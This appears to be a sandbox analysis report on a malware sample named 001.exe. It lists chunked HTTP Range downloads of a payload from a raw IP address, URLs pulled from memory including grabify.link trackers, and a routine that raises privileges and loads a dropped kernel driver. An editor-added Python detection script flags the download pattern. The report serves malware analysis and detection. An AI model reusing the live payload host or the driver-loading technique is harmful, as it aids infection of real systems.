Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4826112-4842495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4842496-4858879User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4858880-4862975User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4862976-4867071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4867072-4899839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4899840-4908031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4908032-4916223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4867072-4899839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4916224-4924415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4924416-4932607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4932608-4936703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4936704-4944895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4944896-4961279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4932608-4936703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4936704-4944895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4961280-4965375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4965376-4998143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4998144-5030911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5030912-5039103User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5039104-5043199User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5043200-5047295User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5047296-5051391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5051392-5067775 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5067776-5075967 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5075968-5084159 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5084160-5092351 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5092352-5094399 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5094400-5127167 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5127168-5143551 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5143552-5159935 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5159936-5176319 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5176320-5192703 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5143552-5159935 (same range as above requested a second time) | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5192704-5196799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5196800-5200895 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5200896-5266431 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5266432-5274623 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5274624-5307391 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5307392-5315583 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5315584-5348351 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5348352-5364735 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5364736-5381119 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5381120-5389311 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5389312-5405695 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5405696-5438463 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5438464-5471231 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5471232-5487615 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5487616-5503999 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5504000-5536767 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5536768-5569535 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /001/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5569536-5606383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
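The traffic above is one payload (/001/01/d1 on 104.168.28.10) pulled down in many small, mostly contiguous Range requests, one range requested twice, under a User-Agent whose "rv:21.0" and "Firefox/10.3" cannot both be true of a real build (current Firefox reports the same major version in both places). The following is an editor-added detection example, not part of the Joe Sandbox report: it parses a constructed proxy-style log (the pipe-separated format and the benign www.example.com line are assumptions) and flags per client/host/path the chunked-download pattern, the retried chunk and the inconsistent User-Agent.

```python
import re
from collections import defaultdict

# Constructed proxy-style log modelled on the report's traffic (not a real capture):
# client_ip|host|request line|Range header|User-Agent, one request per line.
SAMPLE_LOG = """\
10.0.0.5|104.168.28.10|GET /001/01/d1 HTTP/1.1|bytes=5051392-5067775|Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
10.0.0.5|104.168.28.10|GET /001/01/d1 HTTP/1.1|bytes=5067776-5075967|Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
10.0.0.5|104.168.28.10|GET /001/01/d1 HTTP/1.1|bytes=5075968-5084159|Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
10.0.0.5|104.168.28.10|GET /001/01/d1 HTTP/1.1|bytes=5067776-5075967|Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
10.0.0.5|104.168.28.10|GET /001/01/d1 HTTP/1.1|bytes=5084160-5092351|Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
10.0.0.7|www.example.com|GET /index.html HTTP/1.1||Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0
"""

RANGE_RE = re.compile(r"^bytes=(\d+)-(\d+)$")
# Gecko "rv:" major version and the Firefox major version from a Firefox-style UA.
UA_RE = re.compile(r"rv:(\d+)(?:\.\d+)*\) Gecko/\d+ Firefox/(\d+)")


def parse_log(text):
    """Split the constructed log into request records (Range parsed to ints)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        client, host, request, rng, ua = line.split("|", 4)
        method, path, _version = request.split(" ", 2)
        m = RANGE_RE.match(rng)
        records.append({
            "client": client, "host": host, "method": method, "path": path,
            "range": (int(m.group(1)), int(m.group(2))) if m else None,
            "ua": ua,
        })
    return records


def firefox_ua_inconsistent(ua):
    """True for a Firefox-style UA whose rv: and Firefox/ majors disagree,
    e.g. the report's 'rv:21.0 ... Firefox/10.3'. Non-Firefox UAs return False."""
    m = UA_RE.search(ua)
    return bool(m) and m.group(1) != m.group(2)


def find_chunked_downloads(records, min_chunks=3):
    """Group ranged GETs by (client, host, path) and summarise each sequence:
    distinct chunks, retried chunks, whether the chunks are contiguous, bytes
    fetched and whether any request used an inconsistent Firefox UA."""
    groups = defaultdict(list)
    for r in records:
        if r["method"] == "GET" and r["range"] is not None:
            groups[(r["client"], r["host"], r["path"])].append(r)
    findings = []
    for (client, host, path), reqs in groups.items():
        ranges = sorted({r["range"] for r in reqs})  # de-duplicate retries
        if len(ranges) < min_chunks:
            continue
        contiguous = all(b[0] == a[1] + 1 for a, b in zip(ranges, ranges[1:]))
        findings.append({
            "client": client, "host": host, "path": path,
            "requests": len(reqs),
            "chunks": len(ranges),
            "retried_chunks": len(reqs) - len(ranges),
            "contiguous": contiguous,
            "bytes": sum(end - start + 1 for start, end in ranges),
            "ua_inconsistent": any(firefox_ua_inconsistent(r["ua"]) for r in reqs),
        })
    return findings


if __name__ == "__main__":
    for finding in find_chunked_downloads(parse_log(SAMPLE_LOG)):
        print(finding)
```

Contiguous, ascending ranges with a retry of one chunk is what a resumable downloader produces; browsers fetching a page do not issue dozens of small Range requests for one path, so the combination with a non-browser UA (or, as here, an impossible browser UA) is a reasonable hunting query against proxy logs, independent of the specific IP, which will not stay relevant.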
Source: 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777409325.0000000002453000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d14
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1D
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1F
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1J
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1N
Source: 001.exe, 00000001.00000002.1777409325.0000000002453000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1ONES-PC
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1Q
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1b
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1m
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1s
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1x
Source: 001.exe, 00000001.00000002.1777482733.00000000027A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1y
Source: 001.exe, 00000001.00000003.1695539618.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1699987714.00000000027C3000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1710936320.00000000027C4000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000002.1777714739.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, 001.exe, 00000001.00000003.1772416089.00000000027C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/001/01/d1~
Source: powershell.exe, 0000000B.00000002.1956010147.00000299EABA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000B.00000002.1956010147.00000299EABA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: 001.exe, 00000001.00000003.1770079988.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, 1Qkj6qa_7944.sys.1.dr | String found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: 001.exe, 00000001.00000003.1770079988.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, 1Qkj6qa_7944.sys.1.dr | String found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
Source: powershell.exe, 00000002.00000002.1365420700.000001FA925B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: 001.exe, 00000001.00000003.1770079988.0000000002E0D000.00000004.00000020.00020000.00000000.sdmp, 1Qkj6qa_7944.sys.1.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1341039549.000001FA82768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1341039549.000001FA82541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1883852620.00000299D24D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1341039549.000001FA82768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1371951384.000001FA9AB60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 0000000B.00000002.1954777646.00000299EAB20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coI
Source: powershell.exe, 00000002.00000002.1341039549.000001FA82541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1883852620.00000299D24D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: 001.exe, 001.exe, 00000001.00000002.1778214896.0000000140010000.00000004.00000001.01000000.00000006.sdmp, 001.exe, 00000001.00000002.1775967110.0000000000840000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: 001.exe | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
Source: powershell.exe, 0000000B.00000002.1883852620.00000299D26F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: 001.exe, 00000001.00000003.1772453482.000000000245E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/64F2HH
Source: 001.exe, 00000001.00000002.1777458339.000000000245E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grabify.link/64F2HHMM
Source: powershell.exe, 00000002.00000002.1365420700.000001FA925B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1935587523.00000299E253D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00845D7C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,RegOpenKeyA,wsprintfA,RegCreateKeyA,RegSetValueExA,RegSetValueExA,RegSetValueExA,wsprintfA,RegSetValueExA,MultiByteToWideChar,wsprintfW,NtLoadDriver,RegCloseKey,RegCloseKey
Source: C:\Users\user\Desktop\001.exe | File created: C:\Windows\Temp\1Qkj6qa_7944.sys
Source: C:\Users\user\Desktop\001.exe | File deleted: C:\Windows\Temp\1Qkj6qa_7944.sys
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00842738
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00845D7C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0098B0B1
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009B10B2
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008420C0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009410D0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B00D8
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00893020
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009B002D
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00969020
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0085104C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0098D040
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0088C06C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00887074
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0099919B
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009BA196
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B2198
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008411CC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009AC1D4
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0085C1D0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0097B1F2
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008911F0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00951113
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0097611E
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0093C118
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0099C117
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00882118
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0099613B
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0098C125
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0085D148
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00896170
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0097B294
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0088D294
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008992B8
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0093C2DB
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B42D8
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_008B22DC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0093A2CC
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0097F2F0
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0089E224
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0087923C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0099A252
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_00885398
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0089E39C
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_0093538A
Source: C:\Users\user\Desktop\001.exe | Code function: 1_2_009943B5
